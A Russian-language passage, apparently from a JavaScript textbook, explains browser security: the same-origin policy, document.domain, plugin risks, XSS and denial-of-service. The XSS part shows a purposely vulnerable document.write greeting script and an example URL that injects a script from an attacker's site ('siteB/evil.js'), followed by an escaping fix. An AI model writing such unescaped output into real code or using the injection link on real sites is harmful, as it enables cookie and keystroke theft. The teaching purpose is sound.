веб-страница может вызвать на исполнение произвольный JavaScript-код. 

Безопасные веб-броузеры, а наиболее распространенные современные броузеры обеспечивают достаточный уровень безопасности, ограничивают теми или иными
способами возможность исполнять сценарии, мешая злонамеренному программному коду получить доступ к конфиденциальным данным, изменить персональные данные пользователя или поставить под угрозу безопасность системы.

JavaScript – это первая линия обороны против злонамеренного кода, поэтому некоторые функциональные возможности этим языком преднамеренно не поддерживаются. Например, клиентский JavaScript-код не предоставляет никакого способа записи или удаления файлов и каталогов на клиентском компьютере.

Без объекта File и функций доступа к файлам JavaScript-программа не может
удалять данные или разводить вирусы в пользовательской системе.

Вторая линия обороны – это наложение ограничений на некоторые поддерживаемые функциональные возможности. 

Например, клиентский JavaScript-код
способен организовать обмен с веб-серверами по протоколу HTTP и может даже
загружать данные с FTP-серверов, а также серверов других типов. 

Однако язык
JavaScript не предоставляет универсальных сетевых примитивов и не может открыть сокет или принять запрос на соединение от другого хоста.

Следующий список включает в себя другие функциональные возможности, которые могут ограничиваться. Следует отметить, что это – не окончательный список. Различные броузеры накладывают разные ограничения, причем многие из
этих ограничений могут устанавливаться пользователем:

• JavaScript-программа может открыть новое окно броузера, но вследствие того, что многие рекламодатели злоупотребляют этой возможностью, большинство броузеров позволяют ограничить эту возможность так, чтобы всплывающие окна могли появиться только в ответ на действия пользователя, такие как щелчок мыши.

• JavaScript-программа не может закрыть другое окно броузера без подтверждения пользователя, если только программа сама не открыла это окно. Это
не дает злонамеренным сценариям вызвать метод 
self.close(), чтобы закрыть окно броузера и выйти из программы.

• JavaScript-программа не может скрыть адрес ссылки, который появляется в строке состояния, когда указатель мыши оказывается на ссылке. (В прошлом
такая возможность была, и обычно она использовалась для предоставления дополнительной информации о ссылке. Многочисленные случаи жульничества
и злоупотребления заставили производителей броузеров от нее отказаться.)


• Сценарий JavaScript не может открыть слишком маленькое окно (размеры которого по одной стороне меньше 100 пикселов) или чрезмерно уменьшить размеры окна. Аналогично сценарий не может переместить окно за пределы экрана или
создать окно, превышающее размеры экрана. Это не дает сценариям открывать окна, которые пользователь не может видеть или легко может не заметить; такие окна могут содержать сценарии, продолжающие работать после
того, как пользователь решил, что они завершились. 
Кроме того, сценарий не может создавать окна без заголовка, потому что такое окно может имитировать системное диалоговое окно и обманом заставить пользователя ввести, например, секретный пароль.

• Свойство value HTML-элемента FileUpload не может быть установлено. Если бы это свойство было доступно, сценарий мог бы установить его значение равным любому желаемому имени файла и заставить форму загрузить на сервер содержимое любого указанного файла (например, файла паролей).

• Сценарий JavaScript не может прочитать содержимое документов с других серверов, отличных от сервера, откуда был получен сам документ с данным сценарием javaScript.
Аналогичным образом сценарий не может зарегистрировать обработчики событий в документах, полученных с других серверов. 
Это предотвращает возможность подсматривания данных, вводимых пользователем (таких как комбинации символов, составляющих пароль) в других страницах. Это ограничение известно как политика общего происхождения 
(same-origin policy).


Политика общего происхождения Same-origin policy*********

Политика общего происхождения накладывает ограничения на содержимое Всемирной паутины, с которым JavaScript-код может взаимодействовать.

 Обычно эта политика вступает в игру, когда на одной веб-странице располагается несколько фреймов, включающих теги <iframe>, или когда открываются другие окна броузера. В этом случае политика общего происхождения ограничивает возможность JavaScript-кода из одного окна взаимодействовать с другими фреймами
или окнами. В частности, сценарий может читать только свойства окон и документов, имеющих общее с самим сценарием происхождение .

Кроме того, политика общего происхождения действует при работе по протоколу HTTP с помощью объекта XMLHttpRequest. 
Этот объект позволяет JavaScript-сценариям, исполняющимся на стороне клиента, отправлять произвольные HTTP-запросы, но только тому веб-серверу, откуда был загружен документ, содержащий сценарий.
Происхождение документа определяется исходя из протокола, хоста и номера порта для URL-адреса, с которого был загружен документ. Документы, загружаемые с других веб-серверов, имеют другое происхождение. Документы, загруженные с разных портов одного и того же хоста, также имеют другое происхождение. 

Наконец, документы, загруженные по протоколу HTTP, по происхождению отличаются от документов, загруженных по протоколу HTTPS, даже если загружены с одного и того же веб-сервера.

Важно понимать, что происхождение самого JS-сценария  не имеет никакого отношения к политике общего происхождения: значение имеет происхождение документа, в который встраивается JS-сценарий. 
Предположим, что JS-сценарий из домена A включается (с помощью атрибута src тега <script>) в веб-страницу из домена B. Этот JS-сценарий будет иметь полный доступ ко всему содержимому этого документа. Если этот JS-сценарий откроет второе окно и загрузит в него документ из домена B, он также будет иметь полный доступ к содержимому этого второго документа. Но если JS-сценарий откроет третье окно и загрузит в него документ из домена C (или даже из домена A), в дело вступит политика общего происхождения и ограничит JS-сценарий в доступе к этому документу.

Политика общего происхождения на самом деле применяется не ко всем свойствам всех объектов в окне, имеющем другое происхождение, но она применяется ко многим из них, в частности, практически ко всем свойствам объекта Document . Кроме того, разные производители броузеров реализуют эту политику немного по-разному. 
(Например, броузер Firefox 1.0 допускает вызов метода history.back() из другого окна, а IE 6 – нет.) 

В любом случае можно считать, что любое окно, содержащее документ, полученный с другого сервера, для ваших сценариев закрыто. Если сценарий открыл такое окно, он
может закрыть его, но он никаким способом не может «заглянуть внутрь» окна.

Политика общего происхождения необходима для того, чтобы не допустить кражу внутренней информации. Без этого ограничения злонамеренный сценарий
(возможно, загруженный в броузер, расположенный в защищенной брандмауэром корпоративной сети) мог бы открыть пустое окно, в надежде обмануть
пользователя и заставить его задействовать это окно для поиска файлов в локальной сети. После этого злонамеренный сценарий мог бы прочитать содержимое этого окна и отправить его обратно на свой сервер. 

Политика общего происхождения предотвращает возможность возникновения такого рода ситуаций.
Тем не менее в других ситуациях политика общего происхождения оказывается слишком строгой. Это создает особые проблемы для крупных веб-сайтов, на которых может функционировать несколько серверов. Например, сценарий с сервера home.example.com мог бы на вполне законных основаниях читать свойства документа, загруженного с developer.example.com, а сценариям с orders.example.com может потребоваться прочитать свойства из документов с catalog.example.com. Чтобы поддерживать такие крупные веб-сайты, можно использовать свойство domain: объекта Document. По умолчанию свойство domain содержит имя сервера, с которого был загружен документ. Это свойство можно установить только равным строке, являющейся допустимым доменным суффиксом первоначального значения.

Другими словами, если значение domain первоначально
было равно строке "home.example.com", то можно установить его равным 
"example.com", но не "home.example" или "ample.com". Кроме того, значение свойства domain должно содержать, по крайней мере, одну точку, чтобы его нельзя было установить равным "com" или другому имени домена верхнего уровня.

Если два окна (или фрейма) содержат сценарии, установившие одинаковые значения свойства domain, политика общего происхождения для этих двух окон ослабляется, и каждое из окон может читать значения свойств другого окна. Например, взаимодействующие сценарии в документах, загруженных с серверов
orders.example.com и catalog.example.com, могут установить свойства document.domain равными 
"example.com", тем самым указывая на общность происхождения документов и разрешая каждому из документов читать свойства другого.

Взаимодействие с модулями расширения и элементами управления ActiveX**************************************

Несмотря на то что в ядре языка JavaScript и базовой объектной модели на стороне клиента отсутствуют средства для работы с сетевым окружением и файловой системой, необходимые в основном для злонамеренного программного кода, тем не менее ситуация не такая простая, как кажется на первый взгляд. 
В большинстве броузеров JavaScript-код используется как «механизм исполнения»
других программных компонентов, таких как элементы управления ActiveX
в IE и модули расширения в других броузерах. Тем самым в распоряжении у сценариев на стороне клиента оказываются мощные средства. 

для организации взаимодействия по протоколу HTTP
применяется элемент управления ActiveX, а 
 для хранения информации на стороне клиента и отображения улучшенной графики используются модули расширения Java и Flash.

Вопросы безопасности приобретают особый смысл, поскольку элементы управления ActiveX и Java-апплеты могут иметь, например, низкоуровневый доступ к сетевым возможностям. Защитная «песочница» для Java не позволяет апплетам
взаимодействовать с серверами, отличными от того, откуда получен апплет; тем
самым закрывается брешь в системе безопасности. 

Но остается основная проблема: если модуль расширения может управляться из сценария, необходимо полное
доверие не только системе безопасности броузера, но и системе безопасности самого модуля расширения. 

На практике модули расширения Java и Flash, похоже,
не имеют проблем с безопасностью и не вызывают появление этих проблем в клиентском JavaScript-коде. Однако элементы управления ActiveX имеют более пестрое прошлое.

Броузер IE обладает возможностью доступа из сценариев к самым
разным элементам управления ActiveX, которые являются частью операционной
системы Windows и которые раньше уже были источниками проблем безопасности. Однако к моменту написания этих строк эти проблемы были решены.


Межсайтовый скриптинг XSS********************************

Термин межсайтовый скриптинг (cross-site scripting), или XSS, относится к области компьютерной уязвимости, когда атакующий внедряет HTML-теги или сценарии в документы на уязвимом веб-сайте. 
Организация защиты от XSS-атак –
обычное дело для веб-разработчиков, занимающихся созданием серверных сценариев. Однако программисты, разрабатывающие клиентские JavaScript-сценарии, также должны знать о XSS-атаках и предпринимать меры защиты от них.

Веб-страница считается уязвимой для XSS-атак, если она динамически создает
содержимое документа на основе пользовательских данных, не прошедших
предварительную обработку по удалению встроенного HTML-кода. В качестве
тривиального примера рассмотрим следующую веб-страницу, которая использует JavaScript-сценарий, чтобы приветствовать пользователя по имени:
*/
/*

<script>
var name = decodeURIComponent(window.location.search.substring(6)) || "";
document.write("Привет " + name);
</script>

*/

/*
Во второй строке сценария вызывается метод
 window.location.search.substring,
с помощью которого извлекается часть адресной строки, начинающаяся с символа ?. Затем с помощью метода document.write() добавляется динамически сгенерированное содержимое документа. Этот сценарий предполагает, что обращение к веб-странице будет производиться с помощью примерно такого URL-адреса:

http://www.example.com/greet.html?name=Давид
В этом случае будет выведен текст «Привет Давид». Но что произойдет, если страница будет запрошена с использованием следующего URL-адреса:

http://www.example.com/greet.html?name=%3Cscript%3Ealert('Давид')%3C/script%3E
С таким содержимым URL-адреса сценарий динамически сгенерирует другой
сценарий (коды %3C и %3E – это угловые скобки)! В данном случае вставленный
сценарий просто отобразит диалоговое окно, которое не представляет никакой
опасности. Но представьте себе такой случай:

http://siteA/greet.html?name=%3Cscript src=siteB/evil.js%3E%3C/script%3E
Межсайтовый скриптинг потому так и называется, что в атаке участвует более
одного сайта. Сайт B (или даже сайт C) включает специально сконструированную ссылку (подобную только что показанной) на сайт A, в которой содержится
сценарий с сайта B. Сценарий evil.js размещается на сайте злоумышленника B,
но теперь этот сценарий оказывается внедренным в сайт A и может делать все,
что ему заблагорассудится с содержимым сайта A. Он может стереть страницу
или вызвать другие нарушения в работе сайта (например, отказать в обслуживании, о чем рассказывается в следующем разделе). Это может отрицательно сказаться на посетителях сайта A. Гораздо опаснее, что такой злонамеренный сценарий может прочитать содержимое cookies, хранящихся на сайте A (возможно
содержащих учетные номера или другие персональные сведения), и отправить
эти данные обратно на сайт B. Внедренный сценарий может даже отслеживать
нажатия клавиш и отправлять эти данные на сайт B.

Универсальный способ предотвращения XSS-атак заключается в удалении HTML-тегов из всех данных сомнительного происхождения, прежде чем использовать их
для динамического создания содержимого документа. 

Чтобы исправить эту проблему в показанном ранее 
файле greet.html, нужно добавить следующую строку
в сценарий, которая призвана удалять угловые скобки, окружающие тег <script>:
*/

name = name.replace(/</g, "&lt;").replace(/>/g, "&gt;");

/*
Межсайтовый скриптинг представляет собой уязвимость, глубоко уходящую
корнями в архитектуру Всемирной паутины. Необходимо осознавать всю глубину этой уязвимости, но дальнейшее ее обсуждение далеко выходит за рамки темы . 

В Интернете есть немало ресурсов, которые помогут вам организовать защиту от атак подобного рода. Наиболее важный из них принадлежит
группе компьютерной «скорой помощи» CERT Advisory: 

http://www.cert.org/advisories/CA'2000'02.html.


Атаки типа отказа в обслуживании************************

Политика общего происхождения и другие меры безопасности прекрасно защищают данные клиента от посягательств со стороны злонамеренного программного кода, но не могут предотвратить атак типа отказа в обслуживании.
 Если вы
посетите злонамеренный веб-сайт и ваш броузер получит JavaScript-сценарий,
в котором в бесконечном цикле вызывается метод alert(), выводящий диалоговое окно, вам придется использовать, например, команду kill в операционной
системе Unix или диспетчер задач в Windows, чтобы завершить работу броузера.

Злонамеренный сайт может также попытаться загрузить центральный процессор компьютера бесконечным циклом с бессмысленными вычислениями. Некоторые типы броузеров (такие как Firefox) автоматически определяют наличие
циклов с продолжительным временем работы и предоставляют пользователю
возможность их прерывать. Это защищает от случайного зацикливания сценария, но злонамеренный программный код для обхода этой защиты может использовать прием на основе метода
 window.setInterval().

 Подобная атака нагружает систему клиента, вызывая огромный расход памяти.
Универсального способа предотвращения таких атак в веб-броузерах не существует. На самом деле это не является общей проблемой Всемирной паутины, т. к.
никаких данных на злонамеренный сайт в этом случае не передается!


Другие реализации JavaScript во Всемирной паутине*******

В дополнение к клиентскому языку JavaScript имеются и другие реализации
языка JavaScript, имеющие отношение ко Всемирной паутине. 
Вам следует знать об их существовании, чтобы не путать с клиентским JavaScript:

- Пользовательские сценарии

Пользовательские сценарии – это новейшее достижение, позволяющее пользователю добавлять сценарии к HTML-документам, прежде чем они будут отображены броузером. После этого веб-страница получает возможность
управляться не только ее автором, но и посетителем веб-сайта. Самым известным примером пользовательского сценария является расширение броузера
Firefox – 
Greasemonkey (http://greasemonkey.mozdev.org). Программное окружение, предоставляемое пользовательским сценариям, похоже, но не идентично клиентскому программному окружению. изучение принципов клиентского JavaScript-программирования можно считать предпосылкой к изучению пользовательского JavaScript-программирования.

- SVG

SVG (Scalable Vector Graphics – масштабируемая векторная графика) – это основанный на XML графический формат, допускающий внедрение JavaScript-сценариев. Как мы выяснили, клиентский JavaScript-код может взаимодейст-
вовать с HTML-документом, в который он внедрен. Аналогичным образом JavaScript-код, встроенный в SVG-файл, может взаимодействовать с XML-элементами этого документа. 
объектная модель SVG-документа несколько отличается от объектной модели HTML-документа.

Спецификацию формата SVG можно найти на сайте
 http://www.w3.org/TR/SVG. 
 
 В приложении B к этой спецификации находится определение DOM SVG.

JavaScript-код находится вне SVG-документа.


- XUL

XUL (XML User interface Language) – это основанный на грамматике XML
язык, предназначенный для описания пользовательских интерфейсов. Графический интерфейс пользователя веб-броузера Firefox создан на основе
XUL-документов. Подобно SVG, грамматика XUL может использоваться в JavaScript-сценариях. 
 JavaScript-код в XUL-документах имеет доступ к совсем другим объектам и прикладным интерфейсам, являясь субъектом иной модели безопасности, нежели клиентский JavaScript-код. 
 Подробнее о XUL можно узнать на сайтах
  http://www.mozilla.org/projects/xul 
  и http://www.xulplanet.com.


-  ActionScript

ActionScript – это язык программирования, подобный JavaScript (он следует
все той же спецификации ECMAScript, но развивался в направлении объектно-ориентированного подхода) и используемый в анимационных Flash-роликах. 
Большая часть материала по основам JavaScript пригодна для изучения ActionScript-программирования. 

Формат Flash
никакого отношения не имеет ни к XML, ни к HTML, а прикладные интерфейсы Flash вообще никак не связаны с JS. 
с помощью клиентского JavaScript-кода можно управлять Flash-роликами. 


*/